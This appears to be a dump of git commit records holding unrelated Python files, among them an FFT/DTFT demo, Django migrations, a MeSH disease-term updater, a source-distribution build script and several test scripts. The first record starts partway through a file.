    sorted_sensors = sorted(sensors.items(), key=lambda e: e[1][0])
    # Display thingspeak field data set up
    if thingspeak_enable:
        display_string.append('')
        display_string.append('Thingspeak write api key: '+key)
        display_string.append('')
        display_string.append('Thingspeak field set up:')
        display_string.append(' Field\tName\t\tValue\tUnit')
        display_string.append(' ---------------------------------------')
        # Loop variable renamed from 'key' so it no longer shadows the
        # API-key parameter of the same name.
        for name, config in sorted_sensors:
            display_string.append(' ' + str(config[s.TS_FIELD]) + '\t' + name +
                                  '\t' + str(config[s.VALUE]) + '\t' + config[s.UNIT])
    # Display RRDtool set up
    if rrd_enable:
        display_string.append('')
        display_string.append('RRDtool set up:')
        for entry in rrd_set:
            display_string += entry
        display_string.append('')
    # Create table header
    display_string.append('')
    header = 'Date\t\tTime\t\t'
    header_names = ''.join(name + '\t' for name, _config in sorted_sensors)
    header = header + header_names + 'TS Send'
    display_string.append(header)
    display_string.append('=' * (len(header) + 5 * header.count('\t')))
    # Find the total number of rows on screen (tabs expand, hence the width fudge above)
    rows, columns = os.popen('stty size', 'r').read().split()
    # Draw screen
    print('\n'.join(display_string))
    # Return number of rows left for data
    return(int(rows) - len(display_string))
| Python | 0.000003 | |
754dc2a5bc26a555576970a494a9de0e5026fae1 | Add DTFT demo | dtft.py | dtft.py | #!/usr/bin/env python3
"""
Using a typical FFT routine and showing the principle
behind the DTFT computation.
"""
import numpy as np
from matplotlib import pyplot
##################################################
# Efficient practical usage
def fft(values, dt):
    """Unitary one-sided spectrum of a real signal sampled every `dt` seconds.

    Returns (frequencies in Hz, complex coefficients). The scaling makes the
    transform norm-preserving, with the DC bin corrected so it is not counted
    twice.
    """
    n = len(values)
    bins = np.fft.rfftfreq(n, dt)
    spectrum = np.fft.rfft(values) * np.sqrt(2 / n)  # scaled for unitarity
    spectrum[0] /= np.sqrt(2)  # don't "double count" the DC alias
    return (bins, spectrum)
# Working principle
def dtft(values, dt):
    """Explicit DTFT of a real signal, matching the unitary rfft bin-for-bin.

    Builds the full matrix of complex exponentials to show the working
    principle behind the FFT routine above.
    """
    n = len(values)
    times = dt * np.arange(n)
    dw = 1/(dt*n)  # frequency resolution (Hz)
    # Integer-based bin construction matches np.fft.rfftfreq for BOTH even
    # and odd n and avoids the float-accumulation fragility of
    # np.arange(0.0, nyquist + dw, dw), which could emit an extra bin.
    freqs = np.arange(n//2 + 1) * dw
    # (rad/s)/Hz                 all w*t products
    dtft_matrix = np.exp(-1j * (2*np.pi) * np.outer(freqs, times))
    coeffs = np.sqrt(2/n) * dtft_matrix.dot(values)  # scaled for unitarity
    coeffs[0] /= np.sqrt(2)  # don't "double count" the DC alias
    return (freqs, coeffs)
##################################################
def function(time):
    """Test signal: the sum of five harmonics of 10 Hz with growing amplitude.

    Harmonic k (k = 0..4) has angular frequency k*20*pi rad/s and amplitude
    k+1, so the k = 0 term is a constant offset of 1.
    """
    base = 20 * np.pi
    return sum((harmonic + 1) * np.cos(harmonic * base * time)
               for harmonic in range(5))
# Demo: 0.2 s of the multi-harmonic test signal sampled at 1 kHz (200 samples).
dt = 0.001
times = np.arange(0.0, 0.2, dt)
values = function(times)
##################################################
# Both implementations must agree bin-for-bin on this signal.
fft_freqs, fft_coeffs = fft(values, dt)
dtft_freqs, dtft_coeffs = dtft(values, dt)
assert np.allclose(fft_freqs, dtft_freqs)
assert np.allclose(fft_coeffs, dtft_coeffs)
##################################################
# Demonstrate Parseval's theorem
# With the unitary scaling, time- and frequency-domain norms coincide.
print(np.linalg.norm(values))
print(np.linalg.norm(dtft_coeffs))
##################################################
# Time series on top, one-sided magnitude spectrum below.
fig = pyplot.figure()
ax = fig.add_subplot(2, 1, 1)
ax.plot(times, values)
ax.set_xlabel("Time (s)", fontsize=16)
ax.grid(True)
ax = fig.add_subplot(2, 1, 2)
ax.scatter(dtft_freqs, np.abs(dtft_coeffs))
ax.set_xlabel("Freq (Hz)", fontsize=16)
ax.grid(True)
pyplot.show()
| Python | 0 | |
f342a3bb330eab74f31f632c81792f93a6e086e8 | Add a script to automate the generation of source distributions for Windows and Linux. | create_distributions.py | create_distributions.py | """Script to automate the creation of Windows and Linux source distributions.
The TOPKAPI_example directory is also copied and the .svn directories stripped
to make a clean distribution. The manual is included in MSWord format for now
because this is how it's stored in SVN.
This script currently relies on Linux tools and will only work on a Linux
system for now.
"""
import os
import shutil
# Shell pipeline that deletes every .svn directory beneath the current
# working directory; executed from inside the freshly copied tree.
command = 'find . -name .svn -type d -print0 | xargs -0 rm -rf'
def make_distro(dist_path, ex_path, files):
    """Assemble a clean distribution directory.

    Copies `ex_path` into `dist_path`, strips the .svn directories from the
    copy (module-level `command`), and copies each extra file in `files`
    into `dist_path`.

    Bug fix: the original emptied `dist_path` with
    'for root, dirs, files in os.walk(...)', which rebound the `files`
    parameter, so the final loop copied leftovers from the walk instead of
    the requested archive/manual files.
    """
    path = os.path.join(dist_path, ex_path)
    # Remove any previous distribution wholesale; copytree recreates the
    # directory tree (including dist_path) below.
    if os.path.isdir(dist_path):
        shutil.rmtree(dist_path)
    shutil.copytree(ex_path, path)
    curr_dir = os.getcwd()
    os.chdir(path)
    try:
        os.system(command)
    finally:
        # Always restore the working directory, even if something raises.
        os.chdir(curr_dir)
    for fname in files:
        shutil.copy(fname, dist_path)
if __name__ == "__main__":
    # make sure the source distributions are built (.tar.gz and .zip in dist/)
    os.system('python setup.py sdist --formats=gztar,zip')
    # make Linux distribution (tar.gz archive + example + MSWord manual)
    dist_path = 'TOPKAPI_linux'
    ex_path = 'TOPKAPI_Example'
    linux_files = ['dist/TOPKAPI-0.1.tar.gz', 'TOPKAPI_Manual.doc']
    make_distro(dist_path, ex_path, linux_files)
    # make Windows distribution (zip archive instead of tar.gz)
    dist_path = 'TOPKAPI_windows'
    ex_path = 'TOPKAPI_Example'
    windows_files = ['dist/TOPKAPI-0.1.zip', 'TOPKAPI_Manual.doc']
    make_distro(dist_path, ex_path, windows_files)
| Python | 0 | |
6fd4aefcc70e28d96d7110a903328f24b6fea5e4 | bring back the in RAM version, it uses less RAM, but too much to pass 10M entries I think | zorin/mreport.py | zorin/mreport.py | import sys
import json
class Site(object):
    """Per-site aggregation of operator status events and visitor messages."""

    def __init__(self):
        # operator id -> chronologically sorted list of (timestamp, online?) events
        self.op_events = {}
        self.chats = set()      # message timestamps handled while an operator was online
        self.emails = set()     # message timestamps that fell back to email
        self.operators = set()  # operator ids seen in status events
        self.visitors = set()   # visitor ids seen in messages

    def add_operator_event(self, ts, op, state):
        """Record an operator going online/offline; events stay deduped and sorted."""
        self.op_events[op] = sorted(set(self.op_events.get(op, []) + [(ts, state)]))
        self.operators.add(op)

    def get_state(self, time_stamp):
        """Return True if at least one operator was online at `time_stamp`."""
        states = []
        for op, events in self.op_events.items():
            # Last known state at or before time_stamp; offline before any event.
            prev_state = False
            for ts, state in events:
                if ts > time_stamp:
                    break
                prev_state = state
            states.append(prev_state)
        # Idiomatic form of "True if True in states else False".
        return any(states)

    def add_chat(self, time_stamp, visitor):
        """Classify a message as chat (operator online) or email, deduped by timestamp."""
        if time_stamp in self.chats or time_stamp in self.emails:
            return
        if self.get_state(time_stamp):
            self.chats.add(time_stamp)
        else:
            self.emails.add(time_stamp)
        self.visitors.add(visitor)

    def report(self, site_id):
        """Print a one-line summary; print() with a single argument works on
        both Python 2 and 3 (the original used the py2-only print statement)."""
        print("{site_id},messages={messages},emails={emails},operators={operators},visitors={visitors}".format(
            site_id=site_id, messages=len(self.chats), emails=len(self.emails),
            operators=len(self.operators), visitors=len(self.visitors)))
def main():
    # Path to a JSON-lines event log is the sole CLI argument.
    fname = sys.argv[1]
    iterations = []
    # Build 15 independent copies of the aggregate state -- apparently to
    # gauge peak RAM usage of the in-memory representation; TODO confirm.
    for iter in range(0,15):
        sites = {}
        iterations.append(sites)
        # Pass 1: replay operator online/offline status events.
        with open(fname) as f:
            for line in f.readlines():
                data = json.loads(line)
                site_id = data['site_id']
                site = sites.setdefault(site_id, Site())
                if data['type'] == 'status':
                    status = True if data['data']['status'] == 'online' else False
                    # intern() dedups repeated operator-id strings (Python 2).
                    site.add_operator_event(int(data['timestamp']), intern(str(data['from'])), status)
        # Pass 2: classify visitor messages against the operator timelines.
        with open(fname) as f:
            for line in f.readlines():
                data = json.loads(line.strip())
                site_id = data['site_id']
                site = sites[site_id]
                if data['type'] == 'message':
                    site.add_chat(int(data['timestamp']), intern(str(data['from'])))
    # for site_id, site in sorted(sites.items(), key=lambda _e: _e[0]):
    #     site.report(site_id)
    # Pause so resident memory can be inspected before the process exits.
    raw_input("Press Enter to continue...")
    print iterations
if __name__ == '__main__':
    # Run only when executed directly (not on import).
    main()
| Python | 0 | |
a038d9e204bd54e69d5a84427bc9a56b04583460 | Create restart script | dbaas/maintenance/scripts/restart_database.py | dbaas/maintenance/scripts/restart_database.py | from datetime import date, timedelta
from maintenance.models import TaskSchedule
from logical.models import Database
def register_schedule_task_restart_database(hostnames):
    """Schedule a 'restart_database' maintenance task for every database that
    has an instance on one of `hostnames`, skipping databases that already
    have one scheduled. The task is placed in the database's maintenance
    window two days from now and a notification mail is sent.
    """
    today = date.today()
    try:
        databases = Database.objects.filter(
            databaseinfra__instances__hostname__hostname__in=hostnames
        ).distinct()
        for database in databases:
            print("Checking database {}".format(database.name))
            # Typo fixed (scheudled -> scheduled); exists() asks the DB for a
            # boolean instead of fetching the matching rows.
            scheduled = TaskSchedule.objects.filter(
                status=TaskSchedule.SCHEDULED,
                database=database,
                method_path='restart_database'
            ).exists()
            if scheduled:
                print("Already scheduled for database {}!".format(
                    database.name)
                )
            else:
                task = TaskSchedule.objects.create(
                    method_path='restart_database',
                    scheduled_for=TaskSchedule.next_maintenance_window(
                        today + timedelta(days=2),
                        database.databaseinfra.maintenance_window,
                        database.databaseinfra.maintenance_day
                    ),
                    database=database
                )
                task.send_mail(is_new=True)
        print("Done")
    except Exception as err:
        # Broad catch is deliberate for this ops script: report and return.
        print("Error: {}".format(err))
| Python | 0.000001 | |
93a396fdfc2b4a9f83ffbeb38c6f5a574f61478e | Add initial MeSH update script | scripts/update_mesh.py | scripts/update_mesh.py | import os
import re
import csv
import gzip
import xml.etree.ElementTree as ET
from urllib.request import urlretrieve
def _get_term_names(record, name):
# We then need to look for additional terms related to the
# preferred concept to get additional names
concepts = record.findall('ConceptList/Concept')
all_term_names = []
for concept in concepts:
# We only look at the preferred concept here
if concept.attrib['PreferredConceptYN'] == 'Y':
terms = concept.findall('TermList/Term')
for term in terms:
term_name = term.find('String').text
if term_name != name:
all_term_names.append(term_name)
return all_term_names
def get_mesh_names(et):
    """Collect disease descriptors from a parsed MeSH XML tree.

    Returns a dict mapping descriptor UID -> [preferred name, *synonyms],
    keeping only descriptors whose tree numbers start with 'C' (diseases).
    """
    disease_names = {}
    for record in et.iterfind('DescriptorRecord'):
        uid = record.find('DescriptorUI').text
        # Diseases live in the 'C' branch of the MeSH tree.
        tree_numbers = record.findall('TreeNumberList/TreeNumber')
        if not any(t.text[0] == 'C' for t in tree_numbers):
            continue
        preferred = record.find('DescriptorName/String').text
        disease_names[uid] = [preferred] + _get_term_names(record, preferred)
    return disease_names
def entries_from_names(names):
    """Flatten {uid: [synonyms...]} into a list of (synonym, uid) rows."""
    entries = [(synonym, uid)
               for uid, synonyms in names.items()
               for synonym in synonyms]
    print('Got a total of %d entries' % len(entries))
    return entries
def load_mesh_resource_file(cache_dir=None):
    """Download (if not cached) and parse the 2019 MeSH descriptor XML.

    cache_dir: directory holding the cached .gz download. Defaults to this
        script's directory. The original read the module global `here`,
        which is only defined under the __main__ guard, so importing the
        module and calling this function raised NameError.

    Returns the parsed ElementTree.
    """
    if cache_dir is None:
        cache_dir = os.path.dirname(os.path.abspath(__file__))
    url = 'ftp://nlmpubs.nlm.nih.gov/online/mesh/2019/xmlmesh/desc2019.gz'
    desc_path = os.path.join(cache_dir, 'mesh_desc2019.gz')
    if not os.path.exists(desc_path):
        print('Download MeSH descriptors from %s' % url)
        urlretrieve(url, desc_path)
        print('Done downloading MeSH descriptors')
    # Process the XML and find descriptor records
    with gzip.open(desc_path) as desc_file:
        print('Parsing MeSH descriptors')
        et = ET.parse(desc_file)
        return et
if __name__ == '__main__':
    # Basic positioning: locate the Reach knowledge-base resource directory
    # relative to this script.
    here = os.path.dirname(os.path.abspath(__file__))
    kb_dir = os.path.join(here, os.pardir, 'src', 'main', 'resources', 'org',
                          'clulab', 'reach', 'kb')
    resource_fname = os.path.join(kb_dir, 'mesh_disease.tsv')

    et = load_mesh_resource_file()
    mesh_names = get_mesh_names(et)
    # We sort the entries first by the synonym but in a way that special
    # characters and capitalization are ignored, then sort by ID
    entries = entries_from_names(mesh_names)
    entries = sorted(entries, key=(lambda x:
                                   (re.sub('[^A-Za-z0-9]', '', x[0]).lower(),
                                    x[1])))
    # Now dump the entries into an updated TSV file
    with open(resource_fname, 'w') as fh:
        writer = csv.writer(fh, delimiter='\t')
        for entry in entries:
            writer.writerow(entry)
    # Also ship a gzipped copy of the TSV alongside the plain one.
    with open(resource_fname, 'rb') as f1, \
            gzip.open(resource_fname + '.gz', 'wb') as f2:
        f2.writelines(f1)
| Python | 0 | |
b28feb542a34cec9ae9d21b1efed5676dcab8956 | Make ContestParticipation.user not nullable; #428 | judge/migrations/0030_remove_contest_profile.py | judge/migrations/0030_remove_contest_profile.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-31 18:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def move_current_contest_to_profile(apps, schema_editor):
    """Forward data migration: copy ContestProfile.current onto the owning
    Profile's new current_contest field."""
    ContestProfile = apps.get_model('judge', 'ContestProfile')
    db_alias = schema_editor.connection.alias
    for cp in ContestProfile.objects.using(db_alias).exclude(current=None).select_related('user'):
        cp.user.current_contest_id = cp.current_id
        cp.user.save()
def move_current_contest_to_contest_profile(apps, schema_editor):
    """Reverse data migration: push Profile.current_contest back onto a
    (created-if-missing) ContestProfile.current."""
    ContestProfile = apps.get_model('judge', 'ContestProfile')
    Profile = apps.get_model('judge', 'Profile')
    db_alias = schema_editor.connection.alias
    for profile in Profile.objects.using(db_alias).exclude(current_contest=None):
        cp = ContestProfile.objects.get_or_create(user=profile)[0]
        cp.current_id = profile.current_contest_id
        cp.save()
def contest_participation_to_profile(apps, schema_editor):
    """Forward data migration: point each ContestParticipation at the Profile
    behind its ContestProfile."""
    ContestParticipation = apps.get_model('judge', 'ContestParticipation')
    db_alias = schema_editor.connection.alias
    for cp in ContestParticipation.objects.using(db_alias).select_related('profile'):
        cp.user_id = cp.profile.user_id
        cp.save()
def contest_participation_to_contest_profile(apps, schema_editor):
    """Reverse data migration: re-link each ContestParticipation to a
    (created-if-missing) ContestProfile for its user."""
    ContestParticipation = apps.get_model('judge', 'ContestParticipation')
    ContestProfile = apps.get_model('judge', 'ContestProfile')
    db_alias = schema_editor.connection.alias
    for cp in ContestParticipation.objects.using(db_alias).select_related('profile'):
        cp.profile = ContestProfile.objects.get_or_create(user_id=cp.user_id)[0]
        cp.save()
class Migration(migrations.Migration):
    # Moves "current contest" tracking and contest history off the
    # ContestProfile model onto Profile, then deletes ContestProfile.

    dependencies = [
        ('judge', '0029_problem_translation'),
    ]

    operations = [
        # Profile gains the pointer formerly held by ContestProfile.current.
        migrations.AddField(
            model_name='profile',
            name='current_contest',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL,
                                       related_name='+', to='judge.ContestParticipation',
                                       verbose_name='Current contest'),
        ),
        migrations.RunPython(move_current_contest_to_profile, move_current_contest_to_contest_profile),
        # Nullable first so existing rows can be backfilled by the RunPython below.
        migrations.AddField(
            model_name='contestparticipation',
            name='user',
            field=models.ForeignKey(null=True, db_index=True, on_delete=django.db.models.deletion.CASCADE,
                                    related_name='contest_history', to='judge.Profile', verbose_name='user'),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='contestparticipation',
            name='profile',
            field=models.ForeignKey(to='judge.ContestProfile', verbose_name='User', related_name='contest_history',
                                    null=True, on_delete=django.db.models.deletion.CASCADE),
        ),
        migrations.RunPython(contest_participation_to_profile, contest_participation_to_contest_profile),
        # Once backfilled, make ContestParticipation.user non-nullable.
        migrations.AlterField(
            model_name='contestparticipation',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contest_history',
                                    to='judge.Profile', verbose_name='user'),
        ),
        migrations.RemoveField(
            model_name='contestparticipation',
            name='profile',
        ),
        migrations.DeleteModel(name='contestprofile'),
    ]
| # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-31 18:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def move_current_contest_to_profile(apps, schema_editor):
    """Forward data migration: copy ContestProfile.current onto the owning
    Profile's new current_contest field."""
    ContestProfile = apps.get_model('judge', 'ContestProfile')
    db_alias = schema_editor.connection.alias
    for cp in ContestProfile.objects.using(db_alias).exclude(current=None).select_related('user'):
        cp.user.current_contest_id = cp.current_id
        cp.user.save()
def move_current_contest_to_contest_profile(apps, schema_editor):
    """Reverse data migration: push Profile.current_contest back onto a
    (created-if-missing) ContestProfile.current."""
    ContestProfile = apps.get_model('judge', 'ContestProfile')
    Profile = apps.get_model('judge', 'Profile')
    db_alias = schema_editor.connection.alias
    for profile in Profile.objects.using(db_alias).exclude(current_contest=None):
        cp = ContestProfile.objects.get_or_create(user=profile)[0]
        cp.current_id = profile.current_contest_id
        cp.save()
def contest_participation_to_profile(apps, schema_editor):
    """Forward data migration: point each ContestParticipation at the Profile
    behind its ContestProfile."""
    ContestParticipation = apps.get_model('judge', 'ContestParticipation')
    db_alias = schema_editor.connection.alias
    for cp in ContestParticipation.objects.using(db_alias).select_related('profile'):
        cp.user_id = cp.profile.user_id
        cp.save()
def contest_participation_to_contest_profile(apps, schema_editor):
    """Reverse data migration: re-link each ContestParticipation to a
    (created-if-missing) ContestProfile for its user."""
    ContestParticipation = apps.get_model('judge', 'ContestParticipation')
    ContestProfile = apps.get_model('judge', 'ContestProfile')
    db_alias = schema_editor.connection.alias
    for cp in ContestParticipation.objects.using(db_alias).select_related('profile'):
        cp.profile = ContestProfile.objects.get_or_create(user_id=cp.user_id)[0]
        cp.save()
class Migration(migrations.Migration):
    # Moves "current contest" tracking and contest history off the
    # ContestProfile model onto Profile, then deletes ContestProfile.
    # NOTE: ContestParticipation.user stays nullable in this revision.

    dependencies = [
        ('judge', '0029_problem_translation'),
    ]

    operations = [
        # Profile gains the pointer formerly held by ContestProfile.current.
        migrations.AddField(
            model_name='profile',
            name='current_contest',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='judge.ContestParticipation', verbose_name='Current contest'),
        ),
        migrations.RunPython(move_current_contest_to_profile, move_current_contest_to_contest_profile),
        # Nullable so existing rows can be backfilled by the RunPython below.
        migrations.AddField(
            model_name='contestparticipation',
            name='user',
            field=models.ForeignKey(null=True, db_index=True, on_delete=django.db.models.deletion.CASCADE, related_name='contest_history', to='judge.Profile', verbose_name='user'),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='contestparticipation',
            name='profile',
            field=models.ForeignKey(to='judge.ContestProfile', verbose_name='User', related_name='contest_history', null=True, on_delete=django.db.models.deletion.CASCADE),
        ),
        migrations.RunPython(contest_participation_to_profile, contest_participation_to_contest_profile),
        migrations.RemoveField(
            model_name='contestparticipation',
            name='profile',
        ),
        migrations.DeleteModel(name='contestprofile'),
    ]
| Python | 0.000103 |
6ea2d5af752e4765be8ef433139f72538fa3a2dd | Check that relationships in SsWang are up-to-date | tests/test_semsim_wang_termwise.py | tests/test_semsim_wang_termwise.py | #!/usr/bin/env python3
"""Test S-value for Table 1 in Wang_2007"""
__copyright__ = "Copyright (C) 2020-present, DV Klopfenstein. All rights reserved."
__author__ = "DV Klopfenstein"
from os.path import join
from sys import stdout
from goatools.base import get_godag
from goatools.semsim.termwise.wang import SsWang
from goatools.godag.consts import RELATIONSHIP_SET
from tests.utils import REPO
from tests.data.ssWang.tbl1 import GO2SVALUE
def test_semsim_wang(prt=stdout):
    """Wang Semantic Similarity tests"""
    godag_path = join(REPO, 'go-basic.obo')
    Run(godag_path, prt).chk_relationships()
class Run:
    """Wang Semantic Similarity tests"""

    def __init__(self, fin_godag, prt):
        # Load the GO DAG with the optional 'relationship' edges SsWang uses.
        self.godag = get_godag(fin_godag, optional_attrs=['relationship'], prt=prt)

    @staticmethod
    def _chk_svalues_a(dag_a):
        """Check values against Table 1"""
        # One S-value per GO term listed in the published table.
        assert len(dag_a.go2svalue) == len(GO2SVALUE)
        for goid, svalue_act in dag_a.go2svalue.items():
            svalue_exp = GO2SVALUE[goid]
            # Tolerance matches the table's printed precision.
            assert abs(svalue_exp - svalue_act) < .001, 'MISMATCH EXP({}) != ACT({})'.format(
                svalue_exp, svalue_act)

    def chk_relationships(self):
        """Check that actual relationships are expected"""
        # Union of every relationship type that actually occurs in the DAG.
        rels_all = set()
        for goterm in self.godag.values():
            rels_cur = goterm.relationship.keys()
            if rels_cur:
                rels_all.update(rels_cur)
        assert rels_all == RELATIONSHIP_SET, 'UNEXPECTED RELATIONSHIPS'
        print('**PASSED: EXPECTED GODag RELATIONSHIPS: {R}'.format(R=sorted(rels_all)))
        # SsWang's default weights must cover every relationship plus 'is_a'.
        rels_all.add('is_a')
        rels_act = set(SsWang.dflt_rel2scf.keys())
        assert rels_all == rels_act, 'BAD SsWang RELATIONSHIPS: {Rs}'.format(Rs=rels_act)
        print('**PASSED: EXPECTED SsWang RELATIONSHIPS: {R}'.format(R=sorted(rels_act)))
if __name__ == '__main__':
    # Allow running this test module directly as a script.
    test_semsim_wang()
# Copyright (C) 2020-present DV Klopfenstein. All rights reserved.
| Python | 0 | |
43eb87c1297ac9999f027f275bce94b3e8f4894e | add problem | leetcode/14_longest_common_prefix.py | leetcode/14_longest_common_prefix.py | """
Write a function to find the longest common prefix string amongst an array of strings.
If there is no common prefix, return an empty string "".
Example 1:
Input: ["flower","flow","flight"]
Output: "fl"
Example 2:
Input: ["dog","racecar","car"]
Output: ""
Explanation: There is no common prefix among the input strings.
Note:
All given inputs are in lowercase letters a-z.
"""
class Solution:
def longestCommonPrefix(self, strs: List[str]) -> str:
| Python | 0.044376 | |
6e1e4478593c73aeef81a5dbcea62f4de8de7fb0 | Add that migration | accounts/migrations/0002_auto__del_profile.py | accounts/migrations/0002_auto__del_profile.py | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    # South schema migration: drops the (now unused) accounts_profile table.
    # The `models` dict below is South's frozen ORM snapshot -- generated
    # code, intentionally left untouched.

    def forwards(self, orm):
        # Deleting model 'Profile'
        db.delete_table(u'accounts_profile')

    def backwards(self, orm):
        # Adding model 'Profile'
        db.create_table(u'accounts_profile', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('user', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['accounts.User'], unique=True)),
        ))
        db.send_create_signal(u'accounts', ['Profile'])

    models = {
        u'accounts.authtoken': {
            'Meta': {'object_name': 'AuthToken'},
            'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
            'token': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.User']"})
        },
        u'accounts.user': {
            'Meta': {'object_name': 'User'},
            'avatar': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'steamid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
            'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
        },
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }

    complete_apps = ['accounts']
347f22593a20c5553b9469fad051dbaa34643082 | add test_log_likelihood.py | crosscat/tests/test_log_likelihood.py | crosscat/tests/test_log_likelihood.py | import argparse
from functools import partial
#
import pylab
pylab.ion()    # interactive mode so the later plot calls draw immediately
pylab.show()
#
from crosscat.LocalEngine import LocalEngine
import crosscat.utils.data_utils as du
import crosscat.utils.timing_test_utils as ttu
import crosscat.utils.convergence_test_utils as ctu


# Command-line knobs for the synthetic-data convergence experiment.
parser = argparse.ArgumentParser()
parser.add_argument('--gen_seed', default=0, type=int)
parser.add_argument('--num_rows', default=100, type=int)
parser.add_argument('--num_cols', default=4, type=int)
parser.add_argument('--num_clusters', default=5, type=int)
parser.add_argument('--num_views', default=1, type=int)
parser.add_argument('--n_steps', default=10, type=int)
args = parser.parse_args()
#
gen_seed = args.gen_seed
num_rows = args.num_rows
num_cols = args.num_cols
num_clusters = args.num_clusters
num_views = args.num_views
n_steps = args.n_steps
#
# Hold out 10% of the rows as a test set.
# NOTE(review): '/' yields a float on Python 3; this script presumably
# targets Python 2 where it is integer division -- confirm before porting.
n_test = num_rows / 10


# generate data
T, M_c, M_r, gen_X_L, gen_X_D = ttu.generate_clean_state(gen_seed, num_clusters,
                                                         num_cols, num_rows, num_views)
T_test = ctu.create_test_set(M_c, T, gen_X_L, gen_X_D, n_test, seed_seed=0)
engine = LocalEngine()
X_L, X_D = engine.initialize(M_c, M_r, T)
# Reference values under the generating (ground-truth) latent state; drawn
# as horizontal lines on the plot below.
gen_mtll = ctu.calc_mean_test_log_likelihood(M_c, T, gen_X_L, gen_X_D, T_test)
gen_preplexity = ctu.calc_mean_test_log_likelihood(M_c, T, gen_X_L, gen_X_D, T)


# run inference
# Per-step diagnostics: mean log likelihood on the training rows
# ("perplexity" here) and on the held-out test rows.
calc_perplexity = lambda p_State: \
    ctu.calc_mean_test_log_likelihood(M_c, T, p_State.get_X_L(),
                                      p_State.get_X_D(), T)
calc_test_log_likelihood = lambda p_State: \
    ctu.calc_mean_test_log_likelihood(M_c, T, p_State.get_X_L(),
                                      p_State.get_X_D(), T_test)
diagnostic_func_dict = dict(
    perplexity=calc_perplexity,
    test_log_likelihood=calc_test_log_likelihood,
)
X_L, X_D, diagnostics_dict = engine.analyze(M_c, T, X_L, X_D,
                                            do_diagnostics=diagnostic_func_dict, n_steps=n_steps)


# plot
pylab.plot(diagnostics_dict['test_log_likelihood'], 'g')
pylab.plot(diagnostics_dict['perplexity'], 'r')
pylab.axhline(gen_mtll, color='k')        # ground-truth test log likelihood
pylab.axhline(gen_preplexity, color='b')  # ground-truth training value
613917df190a72de63238149a2128affe94f9f39 | Add a snippet. | python/pyqt/pyqt5/widget_QTableView_delegate_on_edit_using_datetimeedit_that_can_be_set_to_none.py | python/pyqt/pyqt5/widget_QTableView_delegate_on_edit_using_datetimeedit_that_can_be_set_to_none.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Ref:
# - http://doc.qt.io/qt-5/modelview.html#3-4-delegates
# - http://doc.qt.io/qt-5/model-view-programming.html#delegate-classes
# - http://doc.qt.io/qt-5/qabstractitemdelegate.html#details
# - http://doc.qt.io/qt-5/qitemdelegate.html#details
# - http://doc.qt.io/qt-5/qstyleditemdelegate.html#details
